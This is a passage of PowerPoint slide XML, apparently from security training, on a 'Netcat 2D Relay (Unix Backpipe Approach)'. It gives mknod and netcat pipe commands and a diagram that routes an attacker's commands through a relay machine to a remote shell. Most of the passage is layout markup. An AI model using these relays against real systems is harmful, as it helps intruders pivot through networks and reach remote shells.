              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc next_hop 22222 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1&gt;backpipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Diagram 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13830949"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="464745" y="3437962"/>
          <a:ext cx="1752600"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6" name="Diagram 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194837527"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7086600" y="3429000"/>
          <a:ext cx="1752600" cy="2514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8" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3429000"/>
            <a:ext cx="4267200" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relay Machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386110" y="2971800"/>
            <a:ext cx="2095445" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker Types here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587947" y="6096000"/>
            <a:ext cx="1545653" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker sees </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>response here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="6096000"/>
            <a:ext cx="1750787" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Shell gets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>commands here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="2971800"/>
            <a:ext cx="2152490" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Shell responses here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4191000"/>
            <a:ext cx="1219200" cy="990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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 11111</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="4191000"/>
            <a:ext cx="1219200" cy="990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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>next_hop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 22222</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="5486400"/>
            <a:ext cx="1219200" cy="3810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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>backpipe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="4343400"/>
            <a:ext cx="0" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200"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6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1896858" y="3294929"/>
            <a:ext cx="5456865" cy="2517328"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 94140 w 5456865"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2517328"/>
              <a:gd name="connsiteX1" fmla="*/ 94140 w 5456865"/>
              <a:gd name="connsiteY1" fmla="*/ 1304243 h 2517328"/>
              <a:gd name="connsiteX2" fmla="*/ 1072475 w 5456865"/>
              <a:gd name="connsiteY2" fmla="*/ 1613142 h 2517328"/>
              <a:gd name="connsiteX3" fmla="*/ 1415750 w 5456865"/>
              <a:gd name="connsiteY3" fmla="*/ 2436875 h 2517328"/>
              <a:gd name="connsiteX4" fmla="*/ 2497068 w 5456865"/>
              <a:gd name="connsiteY4" fmla="*/ 2402552 h 2517328"/>
              <a:gd name="connsiteX5" fmla="*/ 2754524 w 5456865"/>
              <a:gd name="connsiteY5" fmla="*/ 1698948 h 2517328"/>
              <a:gd name="connsiteX6" fmla="*/ 2754524 w 5456865"/>
              <a:gd name="connsiteY6" fmla="*/ 926699 h 2517328"/>
              <a:gd name="connsiteX7" fmla="*/ 2823180 w 5456865"/>
              <a:gd name="connsiteY7" fmla="*/ 858054 h 2517328"/>
              <a:gd name="connsiteX8" fmla="*/ 3629877 w 5456865"/>
              <a:gd name="connsiteY8" fmla="*/ 514833 h 2517328"/>
              <a:gd name="connsiteX9" fmla="*/ 4419410 w 5456865"/>
              <a:gd name="connsiteY9" fmla="*/ 1012504 h 2517328"/>
              <a:gd name="connsiteX10" fmla="*/ 4848505 w 5456865"/>
              <a:gd name="connsiteY10" fmla="*/ 1561659 h 2517328"/>
              <a:gd name="connsiteX11" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY11" fmla="*/ 1561659 h 2517328"/>
              <a:gd name="connsiteX12" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY12" fmla="*/ 2282425 h 2517328"/>
              <a:gd name="connsiteX13" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY13" fmla="*/ 2316747 h 251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56865" h="2517328">
                <a:moveTo>
                  <a:pt x="94140" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12612" y="517693"/>
                  <a:pt x="-68916" y="1035386"/>
                  <a:pt x="94140" y="1304243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257196" y="1573100"/>
                  <a:pt x="852207" y="1424370"/>
                  <a:pt x="1072475" y="1613142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1292743" y="1801914"/>
                  <a:pt x="1178318" y="2305307"/>
                  <a:pt x="1415750" y="2436875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1653182" y="2568443"/>
                  <a:pt x="2273939" y="2525540"/>
                  <a:pt x="2497068" y="2402552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2720197" y="2279564"/>
                  <a:pt x="2711615" y="1944923"/>
                  <a:pt x="2754524" y="1698948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2797433" y="1452973"/>
                  <a:pt x="2743081" y="1066848"/>
                  <a:pt x="2754524" y="926699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2765967" y="786550"/>
                  <a:pt x="2677288" y="926698"/>
                  <a:pt x="2823180" y="858054"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2969072" y="789410"/>
                  <a:pt x="3363839" y="489091"/>
                  <a:pt x="3629877" y="514833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3895915" y="540575"/>
                  <a:pt x="4216305" y="838033"/>
                  <a:pt x="4419410" y="1012504"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4622515" y="1186975"/>
                  <a:pt x="4682589" y="1470133"/>
                  <a:pt x="4848505" y="1561659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5014421" y="1653185"/>
                  <a:pt x="5320508" y="1441531"/>
                  <a:pt x="5414909" y="1561659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5509310" y="1681787"/>
                  <a:pt x="5414909" y="2282425"/>
                  <a:pt x="5414909" y="2282425"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5414909" y="2316747"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0000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Isosceles Triangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7162800" y="5562600"/>
            <a:ext cx="304800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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Freeform 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095047" y="3312090"/>
            <a:ext cx="1331975" cy="2386902"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1251048 w 1331975"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2386902"/>
              <a:gd name="connsiteX1" fmla="*/ 1251048 w 1331975"/>
              <a:gd name="connsiteY1" fmla="*/ 1287082 h 2386902"/>
              <a:gd name="connsiteX2" fmla="*/ 410023 w 1331975"/>
              <a:gd name="connsiteY2" fmla="*/ 1544498 h 2386902"/>
              <a:gd name="connsiteX3" fmla="*/ 221221 w 1331975"/>
              <a:gd name="connsiteY3" fmla="*/ 2316747 h 2386902"/>
              <a:gd name="connsiteX4" fmla="*/ 15256 w 1331975"/>
              <a:gd name="connsiteY4" fmla="*/ 2351069 h 2386902"/>
              <a:gd name="connsiteX5" fmla="*/ 15256 w 1331975"/>
              <a:gd name="connsiteY5" fmla="*/ 2316747 h 2386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1975" h="2386902">
                <a:moveTo>
                  <a:pt x="1251048" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1321133" y="514833"/>
                  <a:pt x="1391219" y="1029666"/>
                  <a:pt x="1251048" y="1287082"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1110877" y="1544498"/>
                  <a:pt x="581661" y="1372887"/>
                  <a:pt x="410023" y="1544498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="238385" y="1716109"/>
                  <a:pt x="287015" y="2182319"/>
                  <a:pt x="221221" y="2316747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155426" y="2451176"/>
                  <a:pt x="49583" y="2351069"/>
                  <a:pt x="15256" y="2351069"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-19071" y="2351069"/>
                  <a:pt x="15256" y="2316747"/>
                  <a:pt x="15256" y="2316747"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">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Isosceles Triangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6019800" y="5486400"/>
            <a:ext cx="304800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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49294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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat 2D Relay (Unix Backpipe Approach)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mknod backpipe p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 11111 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0&lt;backpipe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc next_hop 22222 1&gt;backpipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Diagram 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4217827768"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="464745" y="3437962"/>
          <a:ext cx="1752600"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6" name="Diagram 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1468919008"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7086600" y="3429000"/>
          <a:ext cx="1752600" cy="2514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8" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3429000"/>
            <a:ext cx="4267200" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relay Machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386110" y="2971800"/>
            <a:ext cx="2095445" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker Types here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587947" y="6096000"/>
            <a:ext cx="1545653" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker sees </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>response here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="6096000"/>
            <a:ext cx="1750787" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Shell gets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>commands here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="2971800"/>
            <a:ext cx="2152490" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Shell responses here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4191000"/>
            <a:ext cx="1219200" cy="990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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 11111</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="4191000"/>
            <a:ext cx="1219200" cy="9906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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>next_hop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 22222</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="5486400"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>backpipe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="4343400"/>
            <a:ext cx="0" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200"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6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1896858" y="3294929"/>
            <a:ext cx="5456865" cy="2517328"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 94140 w 5456865"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2517328"/>
              <a:gd name="connsiteX1" fmla="*/ 94140 w 5456865"/>
              <a:gd name="connsiteY1" fmla="*/ 1304243 h 2517328"/>
